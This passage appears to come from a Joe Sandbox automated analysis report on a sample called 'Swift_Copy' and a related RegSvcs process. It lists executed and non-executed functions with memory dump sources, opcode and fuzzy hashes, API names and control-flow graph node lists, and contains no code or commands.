                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 23d6c6916b44129b267d19220dd05ea47340ed4749f192429b117a9320cf36fe
                            • Instruction ID: 38e6022dc4fe737e00785ee360eebe0dcf8f620a341cfcae1fac78dba53c2dcf
                            • Opcode Fuzzy Hash: 23d6c6916b44129b267d19220dd05ea47340ed4749f192429b117a9320cf36fe
                            • Instruction Fuzzy Hash: 6A1106B58003489FCB10DF99D885BDEFBF8FB48320F108559E958A7200C379A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018EB318 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018EB37E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 6aeed4fe2966695b7d84810855d42a544ad8a239933fc0eec7dc80c1fa43051c
                            • Instruction ID: 5c3b317cfe2f2d41d90120dab75f1a54cdfcaf02655c4500e857756700049daf
                            • Opcode Fuzzy Hash: 6aeed4fe2966695b7d84810855d42a544ad8a239933fc0eec7dc80c1fa43051c
                            • Instruction Fuzzy Hash: FC11D2B5C002498FDB14DF9AC445ADEFBF4EF49714F10841AD919A7210D379A545CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0164D4C4 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15536c9cba719d86559910c988520d763ae002389ac28033dc252c5111770f7b
                            • Instruction ID: 9d0241a6f1bcfd0e24f7f70e27216a383afdab693e3b96603f6fc64fd4a84685
                            • Opcode Fuzzy Hash: 15536c9cba719d86559910c988520d763ae002389ac28033dc252c5111770f7b
                            • Instruction Fuzzy Hash: BC210371A00240DFDB09DF58D9C0F26BF65FBA8318F20C569E9090B356C73AD416CAE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0164D3D8 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d2886a856024f936b50ca0b59e84a47417d6e9bf86b20beddcde7b61ad8dd61
                            • Instruction ID: b0da9b9e587a6ba4ab0dda32c7d259bd82b2ce9fe6ac8b43a4d827d9f7d3e355
                            • Opcode Fuzzy Hash: 5d2886a856024f936b50ca0b59e84a47417d6e9bf86b20beddcde7b61ad8dd61
                            • Instruction Fuzzy Hash: 03210671900204DFDB05DF58D9C0B56BF65FBA8324F20C569E9090B356C33AE456C6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0165D1D4 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc47c9c10222cfd3b18f0294f6348640719b19fe497506def52e99ebef75d0fb
                            • Instruction ID: 6654ad4b729875a17c923d8ddff805a124962b8e94404b1f52d0fb5e4148dc5a
                            • Opcode Fuzzy Hash: dc47c9c10222cfd3b18f0294f6348640719b19fe497506def52e99ebef75d0fb
                            • Instruction Fuzzy Hash: AC21F271504204EFDB45DFA8D9C0B26BBA5FB88364F20C56DEE094B396C37AD446CA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0165D01C Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74a3f7f349fd00f791a63efdf03166712e3a81e9eaf7635c363ecbb64a0b2b15
                            • Instruction ID: 67caf362f16bf102ad49c794d1069ef539f6b6db8c430210ceb0e9971e4bc0dd
                            • Opcode Fuzzy Hash: 74a3f7f349fd00f791a63efdf03166712e3a81e9eaf7635c363ecbb64a0b2b15
                            • Instruction Fuzzy Hash: 23210071604200DFDB55DF68D980B26BF65EB88314F20C569DD0A4B396C33AD407CA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0165D005 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 339ddb711001c790a0ee0e0de03c5ed9d6b710d226f5ac527f20550703bc0f57
                            • Instruction ID: 5f1aff4efc9cb3d1e916be1268cf2e962c8626316e9b396cb00bb17f3d87f236
                            • Opcode Fuzzy Hash: 339ddb711001c790a0ee0e0de03c5ed9d6b710d226f5ac527f20550703bc0f57
                            • Instruction Fuzzy Hash: 59219F755083809FDB03CF64D994B15BF71EB46214F28C5EAD8498F3A7C33A980ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0164D4BF Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: a68f6e82722f0b2478bc248cf6e3dea54f075fe48be5f5aa4ed4c769755c91af
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 1A11DF72904280CFCB06CF54D9C4B16BF71FB98314F24C6A9D9490B256C336D45ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0164D3D3 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction ID: 48f8ab290eea3465a43d30c58d45e673cd0221bcbcdb846c67ec7b2efc4b649c
                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                            • Instruction Fuzzy Hash: 8211CD76804240DFDB02CF54D9C4B56BF61FB94224F24C6A9D9090A256C33AE45ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0165D1CF Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105561430.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_165d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction ID: 7b6ad5e6ca808f00287655220f27a1a735d1b557363b77d0d606f531517c80b3
                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction Fuzzy Hash: F411BB75504280DFDB02CF54C9C4B15BFA1FB84224F24C6ADDD494B396C33AD44ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0164D745 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3a2313a18bf8cd22c499edf9a8a8ba04c1accf4ee85883e386a8f1f23b69632
                            • Instruction ID: 5e3289133a21b3dc7850dc9950d03adb5a77d1c8cab19ad3b3436b18b96af854
                            • Opcode Fuzzy Hash: e3a2313a18bf8cd22c499edf9a8a8ba04c1accf4ee85883e386a8f1f23b69632
                            • Instruction Fuzzy Hash: 7101A7714043849BE720DAA9CD84B76FF9CEF55324F18C56AED090A396D3799841CA71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0164D744 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2105512677.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_164d000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d4d5439ec3793cb5a950c13a1198dd63ed44bc5fd52d0a79cbde494897800fe
                            • Instruction ID: be56ead40803a02f1d9c3feb0f261e2ac375ca69b8bf3cbd978bd1e76134d92c
                            • Opcode Fuzzy Hash: 1d4d5439ec3793cb5a950c13a1198dd63ed44bc5fd52d0a79cbde494897800fe
                            • Instruction Fuzzy Hash: 5FF062714043849FE7218E1ACD88B62FF98EF55634F18C55AED485A396C3799844CAB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 07663E98 Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID: T+-q$[V~*$]\`
                            • API String ID: 0-3978741314
                            • Opcode ID: 66e561a1a0304401d55cd9cc8a91daed5baf076bebd2a55f9743bf5aedd01e9b
                            • Instruction ID: 2b5061416ff0fa9a419c5a0b771f6b5d380555c2fc98c492543cd7247977dace
                            • Opcode Fuzzy Hash: 66e561a1a0304401d55cd9cc8a91daed5baf076bebd2a55f9743bf5aedd01e9b
                            • Instruction Fuzzy Hash: 7FB106B0E152199BCF04CFAAD98589EFBF2BF99310F54D52AD41ABB314D730A9028F54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766D460 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3ee84cde30192b1b52e5f2c801c89a0771be3f0adecf1cf862a1b594b7c44ab
                            • Instruction ID: cc4ba1f1c048ddd744694a5ef1874b87d84dfcc0f0c9d1ae6a7772127eda5caa
                            • Opcode Fuzzy Hash: a3ee84cde30192b1b52e5f2c801c89a0771be3f0adecf1cf862a1b594b7c44ab
                            • Instruction Fuzzy Hash: DBE13AB4E001198FDB14DFA9C584AAEFBB2FF89305F648169E415AB356C730AD41CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766C4C8 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e2673f4c917eca8ce83e944f014de387fc1846becf9c030584bfd68ba5c8d353
                            • Instruction ID: 7873a9e7630926b3f94153fe3fa119ca7d6fba26433d93de247e6dec3a4471e8
                            • Opcode Fuzzy Hash: e2673f4c917eca8ce83e944f014de387fc1846becf9c030584bfd68ba5c8d353
                            • Instruction Fuzzy Hash: 1AE12AB4E005198FCB14DFA9C584AAEFBB2FF89305F64816AE455A7316C730AD41CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766CE78 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10c74a8caf8e82c25623e9ff6983459a44ed042d79ea36d6abeccab56d027db6
                            • Instruction ID: 293011f357e1b99f3f2564b5d70be6807b13cfb79eeb64364524cbc8dc670df6
                            • Opcode Fuzzy Hash: 10c74a8caf8e82c25623e9ff6983459a44ed042d79ea36d6abeccab56d027db6
                            • Instruction Fuzzy Hash: 5DE12BB4E001198FDB14DFA9C584AAEFBB2FF89305F648169D515AB316C730AD42CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766ACC8 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cf611166a0c9fdf97123f2fc1f3b8010fdc32d532cde389ddbd1a9bd3273fc4f
                            • Instruction ID: 7f0852d200df8ba7cfba504fb4f1f07e0231f13941e7cd71438c71664a59a603
                            • Opcode Fuzzy Hash: cf611166a0c9fdf97123f2fc1f3b8010fdc32d532cde389ddbd1a9bd3273fc4f
                            • Instruction Fuzzy Hash: 53E119B4E001198FCB14DFA8C584AAEBBB2FF89305F64C15AE415AB356D731AD41CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07661EAF Relevance: .3, Instructions: 293COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c262bfa678fa7c911163eb257f1f0c20f58d1c5a26b44e1b66e0e591d586b073
                            • Instruction ID: 92706aa4151cb93675eb592fd2b3ebdfa28344af3ba540951c74a38ab7a57189
                            • Opcode Fuzzy Hash: c262bfa678fa7c911163eb257f1f0c20f58d1c5a26b44e1b66e0e591d586b073
                            • Instruction Fuzzy Hash: 52E13932C10B1A8ACB15EB64D950BADB775FF99300F10D79AD10A37211EB706ED9CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07661EC0 Relevance: .3, Instructions: 264COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d615f0e590c1efceeba00c6b24bc85af146e04fb254a79fd7d669be6d8cbf0a5
                            • Instruction ID: f221890b8f108a7742fa48ac6ad931c8912d349c2de1ae58fee7473a1dfa9e38
                            • Opcode Fuzzy Hash: d615f0e590c1efceeba00c6b24bc85af146e04fb254a79fd7d669be6d8cbf0a5
                            • Instruction Fuzzy Hash: 84D11932C60A1A8ACB15EB64D950BADB775FF99300F10D79AD10A37211EB707ED8CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018ED93C Relevance: .3, Instructions: 264COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d5e14d55383eb6c777135ca714db4eaec76880966592f13e906c73d786640d6
                            • Instruction ID: e6db84389a49726ded369d70bb14a663811705731c9bb86ba45b31d1a8ad0ffa
                            • Opcode Fuzzy Hash: 3d5e14d55383eb6c777135ca714db4eaec76880966592f13e906c73d786640d6
                            • Instruction Fuzzy Hash: 78A16F32E0020A8FCF15DFA8C85459EBBF6FF96300B15856AEA05EB255DB31EA15CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766C4B8 Relevance: .1, Instructions: 131COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53e9bde24f64f1dfe74cba1acd3d36d2df346862ec5c2cc03de4f9e9838da972
                            • Instruction ID: f22b885cd482aa3b187ead495625d4b3b6efbddab7ee8fc689564f768ace06a2
                            • Opcode Fuzzy Hash: 53e9bde24f64f1dfe74cba1acd3d36d2df346862ec5c2cc03de4f9e9838da972
                            • Instruction Fuzzy Hash: D55139B0E006198FDB14CFA9C5845AEBBF2FF89305F24C16AD418A7316D734A941CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766CE68 Relevance: .1, Instructions: 131COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8b62436e676071534cebd69e535d0bdd28dc57118c5a417aac13e83f7ce79bc4
                            • Instruction ID: 2be3ffd47a1e9c057a6f9ade613236b4cf989ec7aa9701956701b44f03f863e7
                            • Opcode Fuzzy Hash: 8b62436e676071534cebd69e535d0bdd28dc57118c5a417aac13e83f7ce79bc4
                            • Instruction Fuzzy Hash: 89510AB4E002198FDB14DFA9C5845AEBBF2FF89305F24C16AD419A7315D734AA42CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07667B90 Relevance: .1, Instructions: 81COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bc622c94a8bc657bcb09740059e37da9134368209a69421fa18d8b4c35170b0c
                            • Instruction ID: d93c0b8ebe387671f33f8f74e6562a1d20cc6705c99c8c62f8316321df6c60b5
                            • Opcode Fuzzy Hash: bc622c94a8bc657bcb09740059e37da9134368209a69421fa18d8b4c35170b0c
                            • Instruction Fuzzy Hash: 7231F1B0D002588FEB18CFAAC9887DEBBF6AF89310F54C46AD40AB7254DB7459858F50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:13.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:2
                            execution_graph 26785 5dde1d0 26786 5dde1dd 26785->26786 26787 5dde205 26785->26787 26793 5ddd5a8 26787->26793 26789 5dde226 26791 5dde2ee GlobalMemoryStatusEx 26792 5dde31e 26791->26792 26794 5dde2a8 GlobalMemoryStatusEx 26793->26794 26796 5dde222 26794->26796 26796->26789 26796->26791

                            Executed Functions

                            Function 00DF9BF8 Relevance: 3.0, Instructions: 3027COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a86bb9939b7895f487a756b179a65d44eba16fc4823b01c4624a58c3a2b390c9
                            • Instruction ID: 0afea8c55bd0ab74ef2a5d41f2fbaf4ea6506494ed448cafb74011b446016838
                            • Opcode Fuzzy Hash: a86bb9939b7895f487a756b179a65d44eba16fc4823b01c4624a58c3a2b390c9
                            • Instruction Fuzzy Hash: 41630A31D10B1A8EDB11EF68C9906A9F7B1FF99300F15D69AE44877221EB70AAD4CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DFCEC0 Relevance: 2.3, Instructions: 2312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0bc4a452cb7ecbaef1ecc7f0ef94f4f6e24cdc0a363047af691c457ffe09964
                            • Instruction ID: 8ce47915d337b22c2a3f5413ff5fe8ab912d1b354b48d584dc90cb41afa83ad5
                            • Opcode Fuzzy Hash: d0bc4a452cb7ecbaef1ecc7f0ef94f4f6e24cdc0a363047af691c457ffe09964
                            • Instruction Fuzzy Hash: B0332F31D107198ECB11EF68C8906ADF7B1FF99300F15C79AE449A7221EB70AAD5CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9BF3 Relevance: 1.4, Instructions: 1352COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bc364c7cfcd550ef21b129dc0587510c1815e6d61b5a04290a7472739c3ab443
                            • Instruction ID: 5a004f229cfb7481ce8241fff06e674cab49084424eb6eb2afafd998f67819f2
                            • Opcode Fuzzy Hash: bc364c7cfcd550ef21b129dc0587510c1815e6d61b5a04290a7472739c3ab443
                            • Instruction Fuzzy Hash: A0E2F931D10B1A8EDB10EB68C990AA9F7B1FF99300F15D79AE45C67121EB70AAD4CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9378 Relevance: .6, Instructions: 614COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 762cebce55e703c1dff8bda2c32f6b7a1fccd24ad14ee35a415b7c3dfd853a8b
                            • Instruction ID: e4f351ccc05d50244c1a624960afb38746c886515e30eae9f90e6b771776c695
                            • Opcode Fuzzy Hash: 762cebce55e703c1dff8bda2c32f6b7a1fccd24ad14ee35a415b7c3dfd853a8b
                            • Instruction Fuzzy Hash: C3327E34E002098FDB14DF68D594BADBBB2EF88310F158469EA09EB395DB71DC41CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF4A98 Relevance: .3, Instructions: 266COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81e63f3f75920c51bef3942c48d2acf6dfc2e25d0d304bb8bb7ed6f52af83343
                            • Instruction ID: efdf3a626249f18b3095f08547f15f103e731b6e621b1ac03ca5905e4845b9ce
                            • Opcode Fuzzy Hash: 81e63f3f75920c51bef3942c48d2acf6dfc2e25d0d304bb8bb7ed6f52af83343
                            • Instruction Fuzzy Hash: 59B15E70E0020D9FDF10CFA9D9817AEBBF2AF88314F19C129D919E7254EB749885CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF3E80 Relevance: .2, Instructions: 238COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f1104b372d094f4c751d7556716c9a0519052fc64226c1ea2ab11118840fb016
                            • Instruction ID: 5a3f3558c918e28446b72cd9ef778cf6da1d2adcfb28264a43e556ae4a2377fa
                            • Opcode Fuzzy Hash: f1104b372d094f4c751d7556716c9a0519052fc64226c1ea2ab11118840fb016
                            • Instruction Fuzzy Hash: 7B916E70E0030D9FDF14CFA8C9857AEBBF2AF88304F15C129E519A7254EB749985CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF6ED7 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1877 df6ed7-df6f42 call df6c40 1886 df6f5e-df6f8c 1877->1886 1887 df6f44-df6f5d call df676c 1877->1887 1891 df6f8e-df6f91 1886->1891 1893 df6fc4-df6fc7 1891->1893 1894 df6f93-df6fa7 1891->1894 1895 df6fc9 call df7908 1893->1895 1896 df6fd7-df6fda 1893->1896 1903 df6fad 1894->1903 1904 df6fa9-df6fab 1894->1904 1900 df6fcf-df6fd2 1895->1900 1897 df6fdc-df7011 1896->1897 1898 df7016-df7019 1896->1898 1897->1898 1901 df702d-df702f 1898->1901 1902 df701b-df7022 1898->1902 1900->1896 1907 df7036-df7039 1901->1907 1908 df7031 1901->1908 1905 df70eb-df70f1 1902->1905 1906 df7028 1902->1906 1909 df6fb0-df6fbf 1903->1909 1904->1909 1906->1901 1907->1891 1910 df703f-df704e 1907->1910 1908->1907 1909->1893 1913 df7078-df708e 1910->1913 1914 df7050-df7053 1910->1914 1913->1905 1916 df705b-df7076 1914->1916 1916->1913 1916->1914
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q$LR]q
                            • API String ID: 0-3917262905
                            • Opcode ID: 0f2f70d7073376263ce136f95766ae36640e112617f00f5d14964703f56adef6
                            • Instruction ID: f458cf07a567a9944376bfba9fdfa07934a4ab906c01a4b51f704cc871ccced7
                            • Opcode Fuzzy Hash: 0f2f70d7073376263ce136f95766ae36640e112617f00f5d14964703f56adef6
                            • Instruction Fuzzy Hash: 9751EF30A0020A8FDB19DF78D4547AEB7B2EF85304F25C46AE505EB290EB75DD46CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05DDE1D0 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
